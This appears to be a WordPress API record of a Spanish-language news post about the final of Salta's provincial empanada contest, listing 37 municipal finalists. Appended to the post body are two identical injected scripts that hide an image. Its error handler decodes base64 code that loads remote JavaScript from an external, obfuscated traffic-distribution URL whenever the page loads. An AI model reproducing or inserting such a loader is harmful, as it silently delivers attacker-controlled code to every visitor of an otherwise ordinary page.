{"id":2450,"date":"2023-04-03T09:08:30","date_gmt":"2023-04-03T12:08:30","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2450"},"modified":"2025-08-14T00:19:50","modified_gmt":"2025-08-14T03:19:50","slug":"37-municipios-participaran-de-la-segunda-edicion-del-concurso-provincial-de-la-empanada","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2450","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/37-municipios-participaran-de-la-segunda-edicion-del-concurso-provincial-de-la-empanada-88860\">37 municipios participar\u00e1n de la segunda edici\u00f3n del Concurso Provincial de la Empanada<\/a>"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#7e132e\"><em>La instancia final se realizar\u00e1 ma\u00f1ana martes 4 de abril, quien logre coronarse con el premio ser\u00e1 reconocido como el embajador provincial durante todo 2023<\/em><\/h3>\n\n\n\n<p>La final de la segunda edici\u00f3n del Concurso Provincial de la Empanada se realizar\u00e1 ma\u00f1ana martes 4 de abril. Esa ser\u00e1 la cita que reunir\u00e1 a 37 campeonas y campeones que, tras haber sido elegidos como los mejores en las instancias municipales, buscar\u00e1n quedarse con el m\u00e1ximo galard\u00f3n de ser coronados como los embajadores de este \u00edcono gastron\u00f3mico para Salta.<\/p>\n\n\n\n<p>La empanada representa en s\u00ed misma una marca de identidad salte\u00f1a que es reconocida por turistas de todo el mundo que arriban a la provincia con el objetivo de descubrir en su sabor un poco m\u00e1s de la cultura.&nbsp;<\/p>\n\n\n\n<p>Adem\u00e1s, este \u00edcono tiene una importante resonancia en lo que al impacto econ\u00f3mico que genera a nivel regional. Esto se cristaliza en la numerosa cantidad de personas que se ha hecho presente en los concursos municipales desarrollados durante el primer semestre del a\u00f1o.<\/p>\n\n\n\n<p>En lo que respecta al t\u00edtulo de \u201cEmbajador\/a provincial de la empanada\u201d, quien sea reconocido con esta distinci\u00f3n ser\u00e1 parte de las acciones tur\u00edsticas que el Ministerio de Turismo y Deportes realiza en las diferentes ferias de promoci\u00f3n a nivel nacional e internacional durante todo el 2023 y hasta que se elija un nuevo\/a embajador\/a en lo que ser\u00e1 la tercera edici\u00f3n de este certamen en 2024.<\/p>\n\n\n\n<p><strong>Finalistas<\/strong><\/p>\n\n\n\n<p>Con una representaci\u00f3n absolutamente federal, el concurso contar\u00e1 con la participaci\u00f3n de 37 campeonas y campeones municipales.<\/p>\n\n\n\n<p>Aguaray &#8211; Alejandra Beatriz Mar\u00eda<br>Angastaco &#8211; Joel Roberto Jes\u00fas<br>Animan\u00e1 &#8211; Jesica Malvina Soledad Cardozo<br>Apolinario Saravia &#8211; Ivana Valeria Correa<br>Campo Quijano &#8211; Argelia del Valle Torres<br>Ciudad de Salta &#8211; Silvina Isabel Marin<br>Coronel Moldes &#8211; Juana Teresa Tolaba<br>Chicoana &#8211; Norma Isabel Tapia<br>El Bordo &#8211; Lidia Valdomera Soria<br>El Carril &#8211; Olga Beatriz Diaz<br>El Galp\u00f3n &#8211; Emilce Antonella Tejedor<br>El Jard\u00edn &#8211; Dominga Eugenia Aguilera<br>El Tala &#8211; Beatriz Clemencia Leal<br>Embarcaci\u00f3n &#8211; Nancy Liliana Ordo\u00f1ez<br>General Ballivi\u00e1n &#8211; Vilma Socorro Landriel<br>General Guemes &#8211; Corina Mamani<br>General Pizarro &#8211; Ofelia Damiana Pavon<br>Guachipas &#8211; Norma Vicenta Soto<br>La Caldera &#8211; Bibiana Estelbina Maidana<br>La Merced &#8211; Mar\u00eda del Valle Marcial<br>La Vi\u00f1a &#8211; Camila Lujan Gonzalez<br>Profesor Salvador Maza &#8211; Elva Candelaria Toro Jesus<br>Molinos &#8211; Marta Alicia Rios<br>La Uni\u00f3n &#8211; Emilia Natalia Claros Juarez<br>Rosario de la Frontera &#8211; Alicia del Valle Villalba<br>Rosario de Lerma &#8211; Carmen Mar\u00eda Tapia<br>San Antonio de los Cobres &#8211; Leocadia Valeria Calpanchay<br>San Carlos &#8211; Bernardo Vicente Alarcon<br>San Jos\u00e9 de los Cerrillos &#8211; Marta Tolaba<br>San Jos\u00e9 de Met\u00e1n &#8211; Raquel Josefina Rojas<br>San Lorenzo &#8211; Ana Fabiana Cruz<br>San Ram\u00f3n de la Nueva Or\u00e1n &#8211; Graciela Victorina Segovia<br>Seclantas &#8211; Julia Eulalia Figueroa<br>Tartagal &#8211; Mirta Noemi Gutierrez<br>Tolar Grande &#8211; Alejandra Noemi Gutierrez<br>Urundel &#8211; Ivonne Josefina Burgos<br>Vaqueros &#8211; Ana Azucena Lopez<br>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"899\" height=\"600\" data-id=\"2451\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3001-concurso-de-la-empanada-saltenia.jpg\" alt=\"\" class=\"wp-image-2451\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3001-concurso-de-la-empanada-saltenia.jpg 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3001-concurso-de-la-empanada-saltenia-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3001-concurso-de-la-empanada-saltenia-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3001-concurso-de-la-empanada-saltenia-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3001-concurso-de-la-empanada-saltenia-629x420.jpg 629w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"899\" height=\"600\" data-id=\"2453\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3002-concurso-de-la-empanada-saltenia.jpg\" alt=\"\" class=\"wp-image-2453\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3002-concurso-de-la-empanada-saltenia.jpg 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3002-concurso-de-la-empanada-saltenia-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3002-concurso-de-la-empanada-saltenia-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3002-concurso-de-la-empanada-saltenia-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/3002-concurso-de-la-empanada-saltenia-629x420.jpg 629w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"2452\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/88860-37-municipios-participaran-de-la-segunda-edicion-del-concurso-provincial-de-la-empanada.jpg\" alt=\"\" class=\"wp-image-2452\"\/><\/figure>\n<\/figure>\n\n\n\n<p>Fuente:\u00a0<strong><em><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/37-municipios-participaran-de-la-segunda-edicion-del-concurso-provincial-de-la-empanada-88860\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La instancia final se realizar\u00e1 ma\u00f1ana martes 4 de abril, quien logre coronarse con el premio ser\u00e1 reconocido como el embajador provincial durante todo 2023 La final de la segunda edici\u00f3n del Concurso Provincial de la Empanada se realizar\u00e1 ma\u00f1ana martes 4 de abril. Esa ser\u00e1 la cita que reunir\u00e1 a 37 campeonas y campeones [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[3],"tags":[],"class_list":{"0":"post-2450","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-gourmet"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2450"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2450"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2450\/revisions"}],"predecessor-version":[{"id":7126,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2450\/revisions\/7126"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2450"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2450"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2450"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}